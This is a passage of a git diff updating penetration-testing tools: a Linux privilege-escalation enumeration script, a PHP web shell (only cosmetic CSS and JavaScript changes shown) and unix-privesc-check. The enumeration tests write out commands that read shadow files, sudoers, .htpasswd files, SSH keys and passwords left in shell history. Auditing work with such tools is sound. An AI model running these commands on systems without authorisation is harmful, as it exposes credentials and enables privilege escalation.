-d" " -f3` + p_user=`echo "$l" | cut -d" " -f4` + p_args=`echo "$l" | cut -d" " -f5-` + if [ $((p_num)) -lt 20 ]; then # few times probably periodic + printf "${red}%s ${reset}%8s ${yellow}%8s ${red}%s\n" "$p_time" "$p_pid" "$p_user" "$p_args" + else + printf "${magenta}%s ${reset}%8s ${yellow}%8s ${reset}%s\n" "$p_time" "$p_pid" "$p_user" "$p_args" + fi + done } #) @@ -440,17 +578,19 @@ lse_run_tests_users() { #user in an administrative group lse_test "usr010" "1" \ "Is current user in an administrative group?" \ - 'grep -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -E "(:|,)$lse_user"' + 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep $lse_grep_opts -E "(:|,)$lse_user"' #other users in an administrative group lse_test "usr020" "1" \ "Are there other users in an administrative groups?" \ - 'grep -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$"' + 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$" | grep $lse_grep_opts -Ei ":[a-z_-]+\$"' #other users with shell lse_test "usr030" "1" \ "Other users with shell" \ - 'grep -E "sh$" /etc/passwd' + 'grep $lse_grep_opts -E ":/[a-z/]+sh\$" /etc/passwd' \ + "" \ + "lse_shell_users" #user env information lse_test "usr040" "2" \ @@ -466,6 +606,19 @@ lse_run_tests_users() { lse_test "usr060" "2" \ "Other users" \ 'cat /etc/passwd' + + #find defined PATHs + lse_test "usr070" "1" \ + "PATH variables defined inside /etc" \ + 'for p in `grep -ERh "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | cut -d= -f2 | tr ":" "\n" | sort -u`; do [ -d "$p" ] && echo "$p";done' \ + "" \ + "lse_exec_paths" + + #check if . is in PATHs + lse_test "usr080" "0" \ + "Is '.' in a PATH variable defined inside /etc?" \ + 'for ep in $lse_exec_paths; do [ "$ep" = "." ] && grep -ER "^ *PATH=.*" /etc/ 2> /dev/null | tr -d \"\'"'"' | grep -E "[=:]\.([:[:space:]]|\$)";done' \ + "usr070" } @@ -480,13 +633,13 @@ lse_run_tests_sudo() { #can we sudo without supplying a password lse_test "sud000" "0" \ "Can we sudo without a password?" \ - 'echo "" | sudo -S id' && lse_sudo=true + 'echo "" | sudo -nS id' && lse_sudo=true #can we list sudo commands without supplying a password $lse_sudo || \ lse_test "sud010" "0" \ "Can we list sudo commands without a password?" \ - 'echo "" | sudo -S -l' \ + 'echo "" | sudo -nS -l' \ "" \ "lse_sudo_commands" @@ -509,8 +662,8 @@ lse_run_tests_sudo() { #check if we can read the sudoers file lse_test "sud040" "1" \ - "Can we read /etc/sudoers?" \ - 'cat /etc/sudoers' + "Can we read sudoers files?" \ + 'grep -R "" /etc/sudoers*' #check users that sudoed in the past lse_test "sud050" "1" \ @@ -526,23 +679,24 @@ lse_run_tests_filesystem() { #writable files outside user's home. NOTE: Does not check if user can write in symlink destination (performance reasons: -L implies -noleaf) lse_test "fst000" "1" \ "Writable files outside user's home" \ - 'find / \! -type l -writable -not -path "$lse_home/*" -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" -not -path "/run/*"; + 'find / -path "$lse_home" -prune -o $lse_find_opts -not -type l -writable -print; # Add symlinks owned by the user (so the user can change where they point) - find / -type l -user $lse_user -not -path "$lse_home/*" -not -path "/proc/*" -not -path "/sys/*" -not -path "/dev/*" -not -path "/run/*"' \ + find / -path "$lse_home" -prune -o $lse_find_opts -type l -user $lse_user -print' \ "" \ "lse_user_writable" #get setuid binaries lse_test "fst010" "1" \ "Binaries with setuid bit" \ - 'find / -perm -4000 -type f' \ + 'find / $lse_find_opts -perm -4000 -type f -print' \ "" \ "lse_setuid_binaries" #uncommon setuid binaries lse_test "fst020" "0" \ "Uncommon setuid binaries" \ - 'local setuidbin="$lse_setuid_binaries"; for cs in "${lse_common_setuid[@]}"; do setuidbin=`echo -e "$setuidbin" | grep -Ev "$cs"`;done ; echo -e "$setuidbin"' \ + 'local setuidbin="$lse_setuid_binaries"; local IFS=" +"; for cs in ${lse_common_setuid}; do setuidbin=`printf "$setuidbin\n" | grep -Ev "^$cs$"`;done ; printf "$setuidbin\n"' \ "fst010" #can we write to any setuid binary @@ -554,13 +708,13 @@ lse_run_tests_filesystem() { #get setgid binaries lse_test "fst040" "1" \ "Binaries with setgid bit" \ - 'find / -perm -2000 -type f' \ + 'find / $lse_find_opts -perm -2000 -type f -print' \ "lse_setgid_binaries" #uncommon setgid binaries lse_test "fst050" "0" \ "Uncommon setgid binaries" \ - 'echo -e "$lse_setgid_binaries" | grep -Ev "^/(bin|sbin|usr/bin|usr/lib|usr/sbin)"' \ + 'printf "$lse_setgid_binaries\n" | grep -Ev "^/(bin|sbin|usr/bin|usr/lib|usr/sbin)"' \ "fst040" #can we write to any setgid binary @@ -582,7 +736,7 @@ lse_run_tests_filesystem() { #check for SSH files in home directories lse_test "fst090" "1" \ "SSH files in home directories" \ - 'for h in $(cut -d: -f6 /etc/passwd | sort | uniq | grep -Ev "^(/|/dev|/bin|/proc|/run/.*|/var/run/.*)$"); do find "$h" \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \; ; done' + 'for h in $(cut -d: -f6 /etc/passwd | sort -u | grep -Ev "^(/|/dev|/bin|/proc|/run/.*|/var/run/.*)$"); do find "$h" \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \; ; done' #check useful binaries lse_test "fst100" "1" \ @@ -597,7 +751,7 @@ lse_run_tests_filesystem() { #looking for credentials in /etc/fstab and /etc/mtab lse_test "fst120" "0" \ "Are there any credentials in fstab/mtab?" \ - 'grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab' + 'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab' #check if current user has mail lse_test "fst130" "1" \ @@ -612,23 +766,47 @@ lse_run_tests_filesystem() { #check for code repositories lse_test "fst150" "1" \ "Looking for GIT/SVN repositories" \ - 'find / \( -name ".git" -o -name ".svn" \)' + 'find / $lse_find_opts \( -name ".git" -o -name ".svn" \) -print' #can we write to files that can give us root lse_test "fst160" "0" \ "Can we write to critical files?" \ - 'for uw in $lse_user_writable; do [ -f "$uw" ] && for cw in "${lse_critical_writable[@]}"; do ls $cw 2>/dev/null | egrep "^$uw$"; done ; done' \ + 'for uw in $lse_user_writable; do [ -f "$uw" ] && IFS=" +"; for cw in ${lse_critical_writable}; do [ "$cw" = "$uw" ] && [ -w "$cw" ] && ls -l $cw; done ; done' \ "fst000" + #can we write to directories that can give us root + lse_test "fst170" "0" \ + "Can we write to critical directories?" \ + 'for uw in $lse_user_writable; do [ -d "$uw" ] && IFS=" +"; for cw in ${lse_critical_writable_dirs}; do [ "$cw" = "$uw" ] && [ -w "$cw" ] && ls -ld $cw; done ; done' \ + "fst000" + + #can we write to directories inside PATHS + lse_test "fst180" "0" \ + "Can we write to directories from PATH defined in /etc?" \ + 'for ep in $lse_exec_paths; do [ -d "$ep" ] && [ -w "$ep" ] && ls -ld "$ep"; done' \ + "usr070" + + #can we read backups + lse_test "fst190" "0" \ + "Can we read any backup?" \ + 'find / $lse_find_opts -path /usr/lib -prune -o -path /usr/share -prune -o -regextype egrep -iregex ".*(backup|dump|cop(y|ies)|bak|bkp)[^/]*\.(sql|tgz|tar|zip)?\.?(gz|xz|bzip2|bz2|lz|7z)?" -readable -type f -exec ls -al {} \;' + + #are there possible credentials in any shell history files + lse_test "fst200" "0" \ + "Are there possible credentials in any shell history file?" \ + 'for h in .bash_history .history .histfile .zhistory; do [ -f "$lse_home/$h" ] && grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=: ][a-z0-9]+" "$lse_home/$h"; done' + #files owned by user lse_test "fst500" "2" \ "Files owned by user '$lse_user'" \ - 'find / -user $lse_user -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \;' + 'find / $lse_find_opts -user $lse_user -type f -exec ls -al {} \;' #check for SSH files anywhere lse_test "fst510" "2" \ "SSH files anywhere" \ - 'find / \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;' + 'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;' #dump hosts.equiv file lse_test "fst520" "2" \ @@ -666,22 +844,25 @@ lse_run_tests_system() { "Does the /etc/passwd have hashes?" \ 'grep -v "^[^:]*:[x]" /etc/passwd' + #check if /etc/group has group password hashes (old system) + lse_test "sys022" "0" \ + "Does the /etc/group have hashes?" \ + 'grep -v "^[^:]*:[x]" /etc/group' + #check if we can read any shadow file - for s in 'shadow' 'shadow-' 'shadow~' 'master.passwd'; do - lse_test "sys030" "0" \ - "Can we read /etc/$s file?" \ - 'cat /etc/$s' - done + lse_test "sys030" "0" \ + "Can we read shadow files?" \ + 'for sf in "shadow" "shadow-" "shadow~" "gshadow" "gshadow-" "master.passwd"; do [ -r "/etc/$sf" ] && printf "%s\n---\n" "/etc/$sf" && cat "/etc/$sf" && printf "\n\n";done' #check for superuser accounts lse_test "sys040" "1" \ "Check for other superuser accounts" \ - 'for u in $(cut -d: -f1 /etc/passwd); do [ $(id -u $u) == 0 ] && echo $u; done | grep -v root' + 'for u in $(cut -d: -f1 /etc/passwd); do [ $(id -u $u) = 0 ] && echo $u; done | grep -v root' #can root log in via SSH lse_test "sys050" "1" \ "Can root user log in via SSH?" \ - 'grep -E "^[[:space:]]*PermitRootLogin " /etc/ssh/sshd_config | grep -E "(yes|without-password)"' + 'grep -E "^[[:space:]]*PermitRootLogin " /etc/ssh/sshd_config | grep -E "(yes|without-password|prohibit-password)"' #list available shells lse_test "sys060" "2" \ @@ -719,12 +900,12 @@ lse_run_tests_security() { #check if we can write an a binary with capabilities lse_test "sec020" "0" \ "Can we write to a binary with caps?" \ - 'for b in $(echo -e "$lse_cap_bin" | cut -d" " -f1); do [ -w "$b" ] && echo "$b"; done' + 'for b in $(printf "$lse_cap_bin\n" | cut -d" " -f1); do [ -w "$b" ] && echo "$b"; done' #check if we have all capabilities in any binary lse_test "sec030" "0" \ "Do we have all caps in any binary?" \ - 'echo -e "$lse_cap_bin" | grep -v "cap_"' + 'printf "$lse_cap_bin\n" | grep -v "cap_"' #search /etc/security/capability.conf for users associated capapilies lse_test "sec040" "1" \ @@ -736,8 +917,13 @@ lse_run_tests_security() { #does user have capabilities lse_test "sec050" "0" \ "Does current user have capabilities?" \ - 'echo -e "$lse_user_caps" | grep "$lse_user"' \ + 'printf "$lse_user_caps\n" | grep "$lse_user"' \ "sec040" + + #can user read the auditd log + lse_test "sec060" "0" \ + "Can we read the auditd log?" \ + 'al=/var/log/audit/audit.log; test -r "$al" && echo "tail $al:" && echo && tail "$al"' } @@ -754,7 +940,7 @@ lse_run_tests_recurrent_tasks() { #cron tasks writable by user lse_test "ret010" "0" \ "Cron tasks writable by user" \ - 'find -L /etc/cron* /etc/anacron /var/spool/cron -writable' \ + 'find -L /etc/cron* /etc/anacron /var/spool/cron -writable' #list cron jobs lse_test "ret020" "1" \ @@ -771,17 +957,18 @@ lse_run_tests_recurrent_tasks() { "Can we list other user cron tasks?" \ 'for u in $(cut -d: -f 1 /etc/passwd); do [ "$u" != "$lse_user" ] && crontab -l -u "$u"; done' - #can we write to executable paths present in cron tasks? - lse_test "ret050" "0" \ - "Can we write to executable paths present in cron jobs" \ - 'for uw in $lse_user_writable; do [ -f "$uw" ] && [ -x "$uw" ] && grep -R "$uw" /etc/crontab /etc/cron.d/ /etc/anacrontab ; done' \ - "fst000" - #can we write to any paths present in cron tasks? - lse_test "ret060" "1" \ + lse_test "ret050" "1" \ "Can we write to any paths present in cron jobs" \ - 'for uw in $lse_user_writable; do grep -R "$uw" /etc/crontab /etc/cron.d/ /etc/anacrontab ; done | sort | uniq' \ - "fst000" + 'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | sort -u`; do [ -w "$p" ] && echo "$p"; done' \ + "" \ + "lse_user_writable_cron_paths" + + #can we write to executable paths present in cron tasks? + lse_test "ret060" "0" \ + "Can we write to executable paths present in cron jobs" \ + 'for uwcp in $lse_user_writable_cron_paths; do [ -w "$uwcp" ] && [ -x "$uwcp" ] && grep $lse_grep_opts -R "$uwcp" /etc/crontab /etc/cron.d/ /etc/anacrontab ; done' \ + "ret050" #list cron files lse_test "ret400" "2" \ @@ -798,7 +985,7 @@ lse_run_tests_recurrent_tasks() { #can we write in any system timer? lse_test "ret510" "0" \ "Can we write in any system timer?" \ - 'echo -e "$lse_user_writable" | grep -E "\.timer$"' \ + 'printf "$lse_user_writable\n" | grep -E "\.timer$"' \ "fst000" #system timers @@ -867,13 +1054,13 @@ lse_run_tests_services() { #check write permissions in init.d/* inetd.conf xinetd.conf lse_test "srv000" "0" \ "Can we write in service files?" \ - 'echo -e "$lse_user_writable" | grep -E "^/etc/(init/|init\.d/|rc\.d/|rc[0-9S]\.d/|rc\.local|inetd\.conf|xinetd\.conf|xinetd\.d/)"' \ + 'printf "$lse_user_writable\n" | grep -E "^/etc/(init/|init\.d/|rc\.d/|rc[0-9S]\.d/|rc\.local|inetd\.conf|xinetd\.conf|xinetd\.d/)"' \ "fst000" #check write permissions for binaries involved in services lse_test "srv010" "0" \ "Can we write in binaries executed by services?" \ - 'for b in $(grep -ERvh "^#" /etc/inetd.conf /etc/xinetd.conf /etc/xinetd.d/ /etc/init.d/ /etc/rc* 2>/dev/null | tr -s "[[:space:]]" "\n" | grep -E "^/" | grep -Ev "^/(dev|run|sys|proc|tmp)/" | sort | uniq); do [ -x "$b" ] && [ -w "$b" ] && echo "$b" done' + 'for b in $(grep -ERvh "^#" /etc/inetd.conf /etc/xinetd.conf /etc/xinetd.d/ /etc/init.d/ /etc/rc* 2>/dev/null | tr -s "[[:space:]]" "\n" | grep -E "^/" | grep -Ev "^/(dev|run|sys|proc|tmp)/" | sort -u); do [ -x "$b" ] && [ -w "$b" ] && echo "$b" done' #init.d files NOT belonging to root lse_test "srv020" "1" \ @@ -934,13 +1121,13 @@ lse_run_tests_services() { #check write permissions in systemd services lse_test "srv500" "0" \ "Can we write in systemd service files?" \ - 'echo -e "$lse_user_writable" | grep -E "^/(etc/systemd/|lib/systemd/).+\.service$"' \ + 'printf "$lse_user_writable\n" | grep -E "^/(etc/systemd/|lib/systemd/).+\.service$"' \ "fst000" #check write permissions for binaries involved in systemd services lse_test "srv510" "0" \ "Can we write in binaries executed by systemd services?" \ - 'for b in $(grep -ERh "^Exec" /etc/systemd/ /lib/systemd/ 2>/dev/null | tr "=" "\n" | tr -s "[[:space:]]" "\n" | grep -E "^/" | grep -Ev "^/(dev|run|sys|proc|tmp)/" | sort | uniq); do [ -x "$b" ] && [ -w "$b" ] && echo "$b" done' + 'for b in $(grep -ERh "^Exec" /etc/systemd/ /lib/systemd/ 2>/dev/null | tr "=" "\n" | tr -s "[[:space:]]" "\n" | grep -E "^/" | grep -Ev "^/(dev|run|sys|proc|tmp)/" | sort -u); do [ -x "$b" ] && [ -w "$b" ] && echo "$b" done' # systemd files not belonging to root lse_test "srv520" "1" \ @@ -954,34 +1141,6 @@ lse_run_tests_services() { } -####################################################################( processes -lse_run_tests_processes() { - lse_header "pro" "processes" - - #lookup process binaries - lse_proc_bin=`(ps -eo comm | sort | uniq | xargs which)2>/dev/null` - - #check if we have wire permissions in any process binary - lse_test "pro000" "0" \ - "Can we write in any process binary?" \ - 'for b in $lse_proc_bin; do [ -w "$b" ] && echo $b; done' - - lse_test "pro010" "1" \ - "Processes running with root permissions" \ - 'ps -u root -U root -f | grep -Ev "\[[[:alnum:]]"' - - #running processes - lse_test "pro500" "2" \ - "Running processes" \ - 'ps auxf' - - #list running process binaries and their permissions - lse_test "pro510" "2" \ - "Running process binaries and permissions" \ - 'echo -e "$lse_proc_bin" | xargs -n1 ls -l' -} - - #####################################################################( software lse_run_tests_software() { lse_header "sof" "software" @@ -996,6 +1155,11 @@ lse_run_tests_software() { "Can we connect to MySQL as root without password?" \ 'mysqladmin -uroot version' + #check if there are credentials stored in .mysql-history + lse_test "sof015" "0" \ + "Are there credentials in mysql_history file?" \ + 'grep -Ei "(pass|identified by|md5\()" "$lse_home/.mysql_history"' + #checks to see if we can connect to postgres templates without password lse_test "sof020" "0" \ "Can we connect to PostgreSQL template0 as postgres and no pass?" \ @@ -1018,7 +1182,29 @@ lse_run_tests_software() { #find htpassword files lse_test "sof040" "0" \ "Found any .htpasswd files?" \ - 'find / -name "*.htpasswd" -print -exec cat {} \;' + 'find / $lse_find_opts -name "*.htpasswd" -print -exec cat {} \;' + + #check if there are ssh private keys in ssh-agent + lse_test "sof050" "0" \ + "Are there private keys in ssh-agent?" \ + 'ssh-add -l' + + #check if there are gpg keys in gpg-agent + lse_test "sof060" "0" \ + "Are there gpg keys cached in gpg-agent?" \ + 'gpg-connect-agent "keyinfo --list" /bye | grep "D - - 1"' + + #check if there is a writable ssh-agent socket + lse_test "sof070" "0" \ + "Can we write to a ssh-agent socket?" \ + 'for f in $lse_user_writable; do test -S "$f" && printf "$f" | grep -Ea "ssh-[A-Za-z0-9]+/agent\.[0-9]+"; done' \ + "fst000" + + #check if there is a writable gpg-agent socket + lse_test "sof080" "0" \ + "Can we write to a gpg-agent socket?" \ + 'for f in $lse_user_writable; do test -S "$f" && printf "$f" | grep -a "gpg-agent"; done' \ + "fst000" #sudo version - check to see if there are any known vulnerabilities with this lse_test "sof500" "2" \ @@ -1049,12 +1235,12 @@ lse_run_tests_containers() { #check to see if we are in a docker container lse_test "ctn000" "1" \ "Are we in a docker container?" \ - 'grep -i docker /proc/self/cgroup; find / -name "*dockerenv*" -exec ls -la {} \;' + 'grep -i docker /proc/self/cgroup; find / $lse_find_opts -name "*dockerenv*" -exec ls -la {} \;' #check to see if current host is running docker services lse_test "ctn010" "1" \ "Is docker available?" \ - 'docker --version; docker ps -a' + 'docker --version; docker ps -a; docker images' #is user a member of the docker group lse_test "ctn020" "0" \ @@ -1069,30 +1255,97 @@ lse_run_tests_containers() { #is user a member of any lxd/lxc group lse_test "ctn210" "0" \ "Is the user a member of any lxc/lxd group?" \ - 'groups | grep "lxc\|lxd"' + 'groups | grep $lse_grep_opts "lxc\|lxd"' +} + + +####################################################################( processes +lse_run_tests_processes() { + lse_header "pro" "processes" + + #wait for the process monitor to finish gathering data + lse_test "pro000" "2" \ + "Waiting for the process monitor to finish" \ + 'while [ ! -s "$lse_procmon_data" ]; do sleep 1; done; cat "$lse_procmon_data"'\ + "" \ + "lse_procs" + + #look for the paths of the process binaries + lse_test "pro001" "2" \ + "Retrieving process binaries" \ + 'printf "%s" "$lse_procs" | cut -d" " -f5 | sort -u | xargs -r which' \ + "pro000" \ + 'lse_proc_bin' + + #look for the users running the + lse_test "pro002" "2" \ + "Retrieving process users" \ + 'printf "%s" "$lse_procs" | cut -d" " -f4 | sort -u' \ + "pro000" \ + 'lse_proc_users' + + #check if we have write permissions in any process binary + lse_test "pro010" "0" \ + "Can we write in any process binary?" \ + 'for b in $lse_proc_bin; do [ -w "$b" ] && echo $b; done'\ + "pro001" + + #list processes running as root + lse_test "pro020" "1" \ + "Processes running with root permissions" \ + 'printf "%s" "$lse_procs" | grep -E "^[^ ]+ [^ ]+ [^ ]+ root" | lse_proc_print' \ + "pro000" + + #list processes running as users with shell + lse_test "pro030" "1" \ + "Processes running by non-root users with shell" \ + 'for user in `printf "%s\n" "$lse_shell_users" | cut -d: -f1 | grep -v root`; do printf "%s" "$lse_proc_users" | grep -qE "(^| )$user( |\$)" && printf "\n\n------ $user ------\n\n\n" && printf "%s" "$lse_procs" | grep -E "^[^ ]+ [^ ]+ [^ ]+ $user" | lse_proc_print; done' \ + "usr030 pro000 pro002" + + #running processes + lse_test "pro500" "2" \ + "Running processes" \ + 'printf "%s\n" "$lse_procs" | lse_proc_print' \ + "pro000" + + #list running process binaries and their permissions + lse_test "pro510" "2" \ + "Running process binaries and permissions" \ + 'printf "%s\n" "$lse_proc_bin" | xargs ls -l' \ + "pro001" } # ##) #( Main -while getopts "hcil:s:" option; do +while getopts "hcCil:e:p:s:S" option; do case "${option}" in - c) lse_color=false;; + c) lse_color=false; lse_grep_opts='--color=never';; + C) lse_alt_color=true;; + e) lse_exclude_paths "${OPTARG}";; i) lse_interactive=false;; l) lse_set_level "${OPTARG}";; - s) lse_selection="${OPTARG//,/ }";; + s) lse_selection="`printf \"%s\" \"${OPTARG}\"|sed 's/,/ /g'`";; + p) lse_proc_time="${OPTARG}";; + S) lse_serve; exit $?;; h) lse_help; exit 0;; *) lse_help; exit 1;; esac done #trap to exec on SIGINT -trap "lse_exit 1" SIGINT +trap "lse_exit 1" 2 + +# use alternative color scheme +$lse_alt_color && lse_recolor lse_request_information lse_show_info PATH="$PATH:/sbin:/usr/sbin" #fix path just in case +lse_procmon & +(sleep "$lse_proc_time"; rm -f "$lse_procmon_lock") & + lse_run_tests_users lse_run_tests_sudo lse_run_tests_filesystem @@ -1101,9 +1354,9 @@ lse_run_tests_security lse_run_tests_recurrent_tasks lse_run_tests_network lse_run_tests_services -lse_run_tests_processes lse_run_tests_software lse_run_tests_containers +lse_run_tests_processes lse_exit 0 #) diff --git a/p0wny-shell.php b/p0wny-shell.php index 8d395bf..f8f41c3 100644 --- a/p0wny-shell.php +++ b/p0wny-shell.php @@ -119,6 +119,22 @@ if (isset($_GET["feature"])) { font-family: monospace; } + *::-webkit-scrollbar-track { + border-radius: 8px; + background-color: #353535; + } + + *::-webkit-scrollbar { + width: 8px; + height: 8px; + } + + *::-webkit-scrollbar-thumb { + border-radius: 8px; + -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3); + background-color: #bcbcbc; + } + #shell { background: #222; max-width: 800px; @@ -146,7 +162,8 @@ if (isset($_GET["feature"])) { @media (max-width: 991px) { #shell-logo { - display: none; + font-size: 6px; + margin: -25px 0; } html, body, #shell { @@ -166,6 +183,12 @@ if (isset($_GET["feature"])) { } } + @media (max-width: 320px) { + #shell-logo { + font-size: 5px; + } + } + .shell-prompt { font-weight: bold; color: #75DF0B; @@ -231,6 +254,10 @@ if (isset($_GET["feature"])) { eShellContent.scrollTop = eShellContent.scrollHeight; } + function _defer(callback) { + setTimeout(callback, 0); + } + function featureShell(command) { _insertCommand(command); @@ -372,8 +399,10 @@ if (isset($_GET["feature"])) { if (historyPosition > 0) { historyPosition--; eShellCmdInput.blur(); - eShellCmdInput.focus(); eShellCmdInput.value = commandHistory[historyPosition]; + _defer(function() { + eShellCmdInput.focus(); + }); } break; case "ArrowDown": @@ -427,6 +456,20 @@ if (isset($_GET["feature"])) { xhr.send(getQueryString()); } + document.onclick = function(event) { + event = event || window.event; + var selection = window.getSelection(); + var target = event.target || event.srcElement; + + if (target.tagName === "SELECT") { + return; + } + + if (!selection.toString()) { + eShellCmdInput.focus(); + } + }; + window.onload = function() { eShellCmdInput = document.getElementById("shell-cmd"); eShellContent = document.getElementById("shell-content"); diff --git a/unix-privesc-check.sh b/unix-privesc-check.sh index 18ef5c2..eed1fef 100755 --- a/unix-privesc-check.sh +++ b/unix-privesc-check.sh @@ -1,1086 +1,137 @@ #!/bin/sh -# unix-privesc-check - Checks Unix system for simple privilege escalations -# Copyright (C) 2008 pentestmonkey@pentestmonkey.net -# -# -# License -# ------- -# This tool may be used for legal purposes only. Users take full responsibility -# for any actions performed using this tool. The author accepts no liability -# for damage caused by this tool. If you do not accept these condition then -# you are prohibited from using this tool. -# -# In all other respects the GPL version 2 applies: +# $Revision$ # # This program is free software; you can redistribute it and/or modify -# it under the terms of the GNU General Public License version 2 as -# published by the Free Software Foundation. +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # -# You should have received a copy of the GNU General Public License along -# with this program; if not, write to the Free Software Foundation, Inc., -# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA # -# You are encouraged to send comments, improvements or suggestions to -# me at pentestmonkey@pentestmonkey.net -# -# -# Description -# ----------- -# Auditing tool to check for weak file permissions and other problems that -# may allow local attackers to escalate privileges. -# -# It is intended to be run by security auditors and pentetration testers -# against systems they have been engaged to assess, and also by system -# admnisitrators who want to check for "obvious" misconfigurations. It -# can even be run as a cron job so you can check regularly for misconfigurations -# that might be introduced. -# -# Ensure that you have the appropriate legal permission before running it -# someone else's system. -# -# TODO List -# --------- -# There's still plenty that this script doesn't do... -# - Doesn't work for shell scripts! These appear as "/bin/sh my.sh" in the process listing. -# This script only checks the perms of /bin/sh. Not what we're after. :-( -# - Similarly for perl scripts. Probably python, etc. too. -# - Check /proc/pid/cmdline for absolute path names. Check security of these (e.g. /etc/snmp/snmpd.conf) -# - Check everything in root's path - how to find root's path? -# - /proc/pid/maps, smaps are readable and lists some shared objects. We should check these. -# - /proc/pid/fd contain symlinks to all open files (but you can't see other people FDs) -# - check for trust relationships in /etc/hosts.equiv -# - NFS imports / exports / automounter -# - Insecure stuff in /etc/fstab (e.g. allowing users to mount file systems) -# - Inspecting people's PATH. tricky. maybe read from /proc/pid/environ, .bashrc, /etc/profile, .bash_profile -# - Check if /etc/init.d/* scripts are readable. Advise user to audit them if they are. -# - .exrc? -# - X11 trusts, apache passwd files, mysql trusts? -# - Daemons configured in an insecure way: tftpd, sadmind, rexd -# - World writable dirs aren't as bad if the sticky bit is set. Check for this before reporting vulns. -# - Maybe do a strings of binaries (and their .so's?) -# - Do a better job of parsing cron lines - search for full paths -# - Maybe LDPATHs from /etc/env.d -# - Check if ldd, ld.so.conf changes have broken this script on non-linux systems. -# - Avoid check certain paths e.g. /-/_ clearly isn't a real directory. -# - create some sort of readable report -# - indicate when it's likely a result is a false positive and when it's not. -# - Skip pseudo processes e.g. [usb-storage] -# - File permission on kernel modules -# - Replace calls to echo with a my_echo func. Should be passed a string and an "importance" value: -# - my_echo 1 "This is important and should always be printed out" -# - my_echo 2 "This is less important and should only be printed in verbose mode" -# - We check some files / dirs multiple times. Slow. Can we implement a cache? -# - grep for PRIVATE KEY to find private ssh and ssl keys. Where to grep? -# - check SGID programs +# (c) Tim Brown, 2012 +# +# / -VERSION="1.4" -HOME_DIR_FILES=".netrc .ssh/id_rsa .ssh/id_dsa .rhosts .shosts .my.cnf .ssh/authorized_keys .bash_history .sh_history .forward" -CONFIG_FILES="/etc/passwd /etc/group /etc/master.passwd /etc/inittab /etc/inetd.conf /etc/xinetd.con /etc/xinetd.d/* /etc/contab /etc/fstab /etc/profile /etc/sudoers" -PGDIRS="/usr/local/pgsql/data ~postgres/postgresql/data ~postgres/data ~pgsql/data ~pgsql/pgsql/data /var/lib/postgresql/data /etc/postgresql/8.2/main /var/lib/pgsql/data" +. lib/misc/stdio -get_owner () { - GET_OWNER_FILE=$1 - GET_OWNER_RETURN=`ls -lLd "$GET_OWNER_FILE" | awk '{print $3}'` +header () { + VERSION="2.1" + SVNVERSION="$Revision$" # Don't change this line. Auto-updated. + SVNVNUM="`echo $SVNVERSION | sed \"s/[^0-9]//g\"`" + if [ -n "${SVNVNUM}" ]; then + VERSION="${VERSION}-svn-${SVNVNUM}" + fi + printf "unix-privesc-check v${VERSION} ( http://code.google.com/p/unix-privesc-check )\n\n" } -get_group () { - GET_GROUP_FILE=$1 - GET_GROUP_RETURN=`ls -lLd "$GET_GROUP_FILE" | awk '{print $4}'` +version () { + header + preamble + printf "Brought to you by:\n" + cat doc/AUTHORS + exit 1 +} + +preamble () { + printf "Shell script to check for simple privilege escalation vectors on UNIX systems.\n\n" } usage () { - echo "unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )" - echo - echo "Usage: unix-privesc-check { standard | detailed }" - echo - echo '"standard" mode: Speed-optimised check of lots of security settings.' - echo - echo '"detailed" mode: Same as standard mode, but also checks perms of open file' - echo ' handles and called files (e.g. parsed from shell scripts,' - echo ' linked .so files). This mode is slow and prone to false ' - echo ' positives but might help you find more subtle flaws in 3rd' - echo ' party programs.' - echo - echo "This script checks file permissions and other settings that could allow" - echo "local users to escalate privileges." - echo - echo "Use of this script is only permitted on systems which you have been granted" - echo "legal permission to perform a security assessment of. Apart from this " - echo "condition the GPL v2 applies." - echo - echo "Search the output for the word 'WARNING'. If you don't see it then this" - echo "script didn't find any problems." - echo -} - -banner () { - echo "Starting unix-privesc-check v$VERSION ( http://pentestmonkey.net/tools/unix-privesc-check )" - echo - echo "This script checks file permissions and other settings that could allow" - echo "local users to escalate privileges." - echo - echo "Use of this script is only permitted on systems which you have been granted" - echo "legal permission to perform a security assessment of. Apart from this " - echo "condition the GPL v2 applies." - echo - echo "Search the output below for the word 'WARNING'. If you don't see it then" - echo "this script didn't find any problems." - echo -} - -MODE="standard" - -if [ ! "$MODE" = "standard" ] && [ ! "$MODE" = "detailed" ]; then - usage - exit 0 -fi - -# Parse any full paths from $1 (config files, progs, dirs). -# Check the permissions on each of these. -check_called_programs () { - CCP_MESSAGE_STACK=$1 - CCP_FILE=$2 